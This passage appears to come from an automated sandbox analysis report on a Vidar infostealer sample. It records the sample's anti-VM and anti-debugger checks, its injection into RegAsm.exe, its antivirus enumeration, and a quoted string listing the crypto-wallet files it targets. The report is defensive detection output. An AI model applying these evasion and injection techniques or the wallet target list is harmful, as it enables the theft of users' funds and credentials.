                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR
                      Country aware sample found (crashes after keyboard check)
                      Source: c:\users\user\desktop\file.exeEvent Logs and Signature results: Application crash and keyboard check
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                      Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                      Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 4EC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 6.7 %
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410220 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410352h3_2_00410220
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416310 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,3_2_00416310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004173B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_004173B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040A410
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_00416B50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040AF10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040A860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416FA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,3_2_00416FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416750 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,3_2_00416750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004103F0 GetSystemInfo,wsprintfA,3_2_004103F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: Amcache.hve.6.drBinary or memory string: VMware
                      Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1976459689.000000000161D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware8[6
                      Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-77609
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041A2BF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004181D0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004181D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410050 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,3_2_00410050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041A2BF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041F398 SetUnhandledExceptionFilter,3_2_0041F398
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041B7E7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041B7E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C70B66C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C70B1F7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C92AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C92AC62
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      .NET source code references suspicious native API functions
                      Source: file.exe, Angelo.csReference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "FreeConsole")
                      Source: file.exe, Angelo.csReference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "FreeConsole")
                      Source: file.exe, Angelo.csReference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "VirtualProtectEx")
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02EC2111 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_02EC2111
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Searches for specific processes (likely to inject)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00411A90 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_00411A90
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1175008Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70B341 cpuid 3_2_6C70B341
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_00410220
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,LocalFree,3_2_00410299
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410150 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,3_2_00410150
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004100D0 GetProcessHeap,HeapAlloc,GetUserNameA,3_2_004100D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004101B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_004101B0
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Vidar
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 0.2.file.exe.3ec5570.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.3ec5570.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local 